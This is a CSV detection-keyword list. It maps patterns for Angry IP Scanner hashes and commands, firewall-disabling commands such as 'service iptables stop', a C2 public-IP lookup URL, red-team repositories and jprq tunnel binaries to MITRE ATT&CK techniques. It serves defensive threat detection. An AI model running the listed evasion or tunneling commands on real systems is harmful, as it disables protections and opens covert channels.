"*e60b16e124c84e2368a0bb9dd85a282a163ad1cc9946745ab14adcca5075d13f*",".{0,1000}e60b16e124c84e2368a0bb9dd85a282a163ad1cc9946745ab14adcca5075d13f.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*e63896070e742e2f06c696a551b5cbf082acad80d48391b42cf2d040823793e6*",".{0,1000}e63896070e742e2f06c696a551b5cbf082acad80d48391b42cf2d040823793e6.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*e6d90023e2588a3c52798d2bee864c6e87066b6e8867b518c4f59c75a4d60cdc*",".{0,1000}e6d90023e2588a3c52798d2bee864c6e87066b6e8867b518c4f59c75a4d60cdc.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*e6e45b8cce5e26017e9c4033b2c9d21a32a30c850f13c39095f8aa2571241c81*",".{0,1000}e6e45b8cce5e26017e9c4033b2c9d21a32a30c850f13c39095f8aa2571241c81.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*e746327fc595317f4fd949c7e46bdfcdcd70a74c9402dc65fef045ec8a2c621d*",".{0,1000}e746327fc595317f4fd949c7e46bdfcdcd70a74c9402dc65fef045ec8a2c621d.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*e76cf4f44dc62c008bb203fa88eb3e942e7f28dafe6a264d2f5970a8befa142f*",".{0,1000}e76cf4f44dc62c008bb203fa88eb3e942e7f28dafe6a264d2f5970a8befa142f.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*e90254549780eb809f13048dbbea4ee473e0ee4aa0d506d89c463881cd6351c1*",".{0,1000}e90254549780eb809f13048dbbea4ee473e0ee4aa0d506d89c463881cd6351c1.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*e9b267aac8adfc7fd11d83c4e6a7efa9940c338207da988b2429d61764fa485d*",".{0,1000}e9b267aac8adfc7fd11d83c4e6a7efa9940c338207da988b2429d61764fa485d.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*ea78a37a389c32e94aafe2115a8d75948b21cee204a5a89b64febd9f18932609*",".{0,1000}ea78a37a389c32e94aafe2115a8d75948b21cee204a5a89b64febd9f18932609.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*ea8792c7e11cad017c54c50f880e487f09581fd2d7f24ab453118ccf35716357*",".{0,1000}ea8792c7e11cad017c54c50f880e487f09581fd2d7f24ab453118ccf35716357.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*eb272642328677b4aef6922f2d845fb6d3e6ba3e0ce1f6b10867c9726f6076a4*",".{0,1000}eb272642328677b4aef6922f2d845fb6d3e6ba3e0ce1f6b10867c9726f6076a4.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*eb6aa78a64ba7c6ed9341855d3aef5742ab13948b6cd445e9c715260f8d10dcb*",".{0,1000}eb6aa78a64ba7c6ed9341855d3aef5742ab13948b6cd445e9c715260f8d10dcb.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*eb91b66cced883e4445f8e26fbf33689c82d04f5c736866d08d00847bb46b1f8*",".{0,1000}eb91b66cced883e4445f8e26fbf33689c82d04f5c736866d08d00847bb46b1f8.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*ecbbcf4b40a507200f72493409d2a0fd22ba7958fca6121679a0b9c2441001a5*",".{0,1000}ecbbcf4b40a507200f72493409d2a0fd22ba7958fca6121679a0b9c2441001a5.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*ed8e23f58c3539380673c26d1ed265f703207cc2866f6c3e9e004859a0a559e5*",".{0,1000}ed8e23f58c3539380673c26d1ed265f703207cc2866f6c3e9e004859a0a559e5.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*ee35e912fdc0dbc8ce07822ab1899f7f4b85e8113e3e1b743b0a303924cd6b22*",".{0,1000}ee35e912fdc0dbc8ce07822ab1899f7f4b85e8113e3e1b743b0a303924cd6b22.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*ee95cc2e9d7a6b048cc0637fab30cee273ee5b0fb144759b25dfc55f5f5434f4*",".{0,1000}ee95cc2e9d7a6b048cc0637fab30cee273ee5b0fb144759b25dfc55f5f5434f4.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*eedf9170ab629a168f92f914dd1e633516ff6b7f8df56b1f459a08d906a29e73*",".{0,1000}eedf9170ab629a168f92f914dd1e633516ff6b7f8df56b1f459a08d906a29e73.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*f63a9a1bff8841613c2f8c0ba7582631b89f4ee7cb0d03b59daa806a8a79ccd5*",".{0,1000}f63a9a1bff8841613c2f8c0ba7582631b89f4ee7cb0d03b59daa806a8a79ccd5.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*f7bb32eb31cc17a691592f1944f8293b247833f39703e7521f92ca230bb6c220*",".{0,1000}f7bb32eb31cc17a691592f1944f8293b247833f39703e7521f92ca230bb6c220.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*f839c9b6fcec3e97ee042604a00edddda9262985a6768a4e16f4dac8eb8d8238*",".{0,1000}f839c9b6fcec3e97ee042604a00edddda9262985a6768a4e16f4dac8eb8d8238.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*f8a6470914148f0fc254ea773d4dfc870b1324953165fb619b2cac985418ab06*",".{0,1000}f8a6470914148f0fc254ea773d4dfc870b1324953165fb619b2cac985418ab06.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*f8da6811a00fd70fbd31ba8532cab47c95d53e675582364cf5d6fb9d484977bc*",".{0,1000}f8da6811a00fd70fbd31ba8532cab47c95d53e675582364cf5d6fb9d484977bc.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*f8def6c6c62783ce0b607d4bb55089b8083f052e1b2da4db1708dd494964b123*",".{0,1000}f8def6c6c62783ce0b607d4bb55089b8083f052e1b2da4db1708dd494964b123.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*f9432ce52449b2bf1d0b92046f1ea0dde1f306740533888c2ff3f190f10be1c2*",".{0,1000}f9432ce52449b2bf1d0b92046f1ea0dde1f306740533888c2ff3f190f10be1c2.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*fa4cdff048c350043700888dcb50a6a5fa1e1dcfd24a86b1942b0d378912e0a4*",".{0,1000}fa4cdff048c350043700888dcb50a6a5fa1e1dcfd24a86b1942b0d378912e0a4.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*faf8cbecf71ca34708fbd7cfdbda9ca81476a29f7dd8f58e1e35bc64b58e8528*",".{0,1000}faf8cbecf71ca34708fbd7cfdbda9ca81476a29f7dd8f58e1e35bc64b58e8528.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*fc4ae0ea29ccdbfb58ac8ee898beae752e1a3e8528e94c02630c9bf34637dadd*",".{0,1000}fc4ae0ea29ccdbfb58ac8ee898beae752e1a3e8528e94c02630c9bf34637dadd.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*fce6c490393cd886beb5859fe7cecfab805098c1f2db88c290209681ee53bf50*",".{0,1000}fce6c490393cd886beb5859fe7cecfab805098c1f2db88c290209681ee53bf50.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*fd68dceff58851ac4a8ba8ad476cd72f3fc0b3e62ada8ee355157f677ea67b07*",".{0,1000}fd68dceff58851ac4a8ba8ad476cd72f3fc0b3e62ada8ee355157f677ea67b07.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*fda286756bd8b976139dfd1dc8e80532af74d8b628d69850d29335dd6d1a44dd*",".{0,1000}fda286756bd8b976139dfd1dc8e80532af74d8b628d69850d29335dd6d1a44dd.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*fdc0f0e9a4cdb1f3533ea2bc643907365556bbb7386645bb143942e60beefab4*",".{0,1000}fdc0f0e9a4cdb1f3533ea2bc643907365556bbb7386645bb143942e60beefab4.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*fdde0e3af2596af6e1952bf4fc050dc4a5bd73c2826775b758fcdca93f91c134*",".{0,1000}fdde0e3af2596af6e1952bf4fc050dc4a5bd73c2826775b758fcdca93f91c134.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*fe57ef744c2f42fa72573f27e8dffefded238722eaeaeecfcbaaab239c4a07c4*",".{0,1000}fe57ef744c2f42fa72573f27e8dffefded238722eaeaeecfcbaaab239c4a07c4.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*ff82293d001f120a624d0b71dc57432f4cbbd813078d4092685f62246b12a918*",".{0,1000}ff82293d001f120a624d0b71dc57432f4cbbd813078d4092685f62246b12a918.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*ipscan 1*.255*",".{0,1000}ipscan\s1.{0,1000}\.255.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*ipscan 10.*",".{0,1000}ipscan\s10\..{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*ipscan 172.*",".{0,1000}ipscan\s172\..{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*ipscan 192.168.*",".{0,1000}ipscan\s192\.168\..{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*ipscan.exe -*",".{0,1000}ipscan\.exe\s\-.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*ipscan-win64-*.exe*",".{0,1000}ipscan\-win64\-.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","1","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*MacOS/ipscan -*",".{0,1000}MacOS\/ipscan\s\-.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*chkconfig off ip6tables*","chkconfig\soff\sip6tables","greyware_tool_keyword","iptables","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","N/A","greyware tool - risks of False positive !","3","6","N/A","N/A","N/A","N/A"
"*chkconfig off iptables*","chkconfig\soff\siptables","greyware_tool_keyword","iptables","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","N/A","greyware tool - risks of False positive !","3","6","N/A","N/A","N/A","N/A"
"*service ip6tables stop*","service\sip6tables\sstop","greyware_tool_keyword","iptables","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","N/A","greyware tool - risks of False positive !","3","6","N/A","N/A","N/A","N/A"
"*service iptables stop*","service\siptables\sstop","greyware_tool_keyword","iptables","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","N/A","greyware tool - risks of False positive !","3","6","N/A","N/A","N/A","N/A"
"*https://ipv4.myip.wtf/text*",".{0,1000}https\:\/\/ipv4\.myip\.wtf\/text.{0,1000}","greyware_tool_keyword","ipv4.myip.wtf","get public ip address. Used by disctopia-c2","T1016 - T1071.001","TA0005 - TA0002","N/A","N/A","Reconnaissance","https://github.com/3ct0s/disctopia-c2/blob/main/libraries/disctopia.py","1","1","N/A","greyware_tools high risks of false positives","N/A","10","498","118","2024-07-18T10:16:19Z","2022-01-02T22:03:10Z"
"*/RedTeaming-Tactics-and-Techniques.git*",".{0,1000}\/RedTeaming\-Tactics\-and\-Techniques\.git.{0,1000}","greyware_tool_keyword","ired.team","Red Teaming Tactics and Techniques","T1593.003","TA0043","N/A","N/A","Reconnaissance","https://github.com/mantvydasb/RedTeaming-Tactics-and-Techniques","1","1","N/A","N/A","7","10","3960","1038","2024-08-22T07:17:31Z","2019-03-02T13:33:33Z"
"*\RedTeaming-Tactics-and-Techniques-master*",".{0,1000}\\RedTeaming\-Tactics\-and\-Techniques\-master.{0,1000}","greyware_tool_keyword","ired.team","Red Teaming Tactics and Techniques","T1593.003","TA0043","N/A","N/A","Reconnaissance","https://github.com/mantvydasb/RedTeaming-Tactics-and-Techniques","1","0","N/A","N/A","7","10","3960","1038","2024-08-22T07:17:31Z","2019-03-02T13:33:33Z"
"*mantvydasb/RedTeaming-Tactics-and-Techniques*",".{0,1000}mantvydasb\/RedTeaming\-Tactics\-and\-Techniques.{0,1000}","greyware_tool_keyword","ired.team","Red Teaming Tactics and Techniques","T1593.003","TA0043","N/A","N/A","Reconnaissance","https://github.com/mantvydasb/RedTeaming-Tactics-and-Techniques","1","1","N/A","N/A","7","10","3960","1038","2024-08-22T07:17:31Z","2019-03-02T13:33:33Z"
"*www.ired.team*",".{0,1000}www\.ired\.team.{0,1000}","greyware_tool_keyword","ired.team","Red Teaming Tactics and Techniques","T1593.003","TA0043","N/A","N/A","Reconnaissance","https://github.com/mantvydasb/RedTeaming-Tactics-and-Techniques","1","1","N/A","N/A","7","10","3960","1038","2024-08-22T07:17:31Z","2019-03-02T13:33:33Z"
"* jprq-windows-386.exe*",".{0,1000}\sjprq\-windows\-386\.exe.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"* jprq-windows-amd64.exe*",".{0,1000}\sjprq\-windows\-amd64\.exe.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*/etc/letsencrypt/live/jprq.site/*",".{0,1000}\/etc\/letsencrypt\/live\/jprq\.site\/.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*/jprq.git*",".{0,1000}\/jprq\.git.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","1","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*/jprq.log*",".{0,1000}\/jprq\.log.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*/jprq.service*",".{0,1000}\/jprq\.service.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*/jprq/server/*.go*",".{0,1000}\/jprq\/server\/.{0,1000}\.go.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*/jprq-darwin-arm64*",".{0,1000}\/jprq\-darwin\-arm64.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","1","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*/jprq-linux-386*",".{0,1000}\/jprq\-linux\-386.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","1","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*/jprq-linux-arm64*",".{0,1000}\/jprq\-linux\-arm64.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","1","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*/jprq-windows-386.exe*",".{0,1000}\/jprq\-windows\-386\.exe.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","1","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*/jprq-windows-amd64.exe*",".{0,1000}\/jprq\-windows\-amd64\.exe.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","1","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*/root/jprq-server*",".{0,1000}\/root\/jprq\-server.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
"*/usr/local/bin/jprq*",".{0,1000}\/usr\/local\/bin\/jprq.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z"
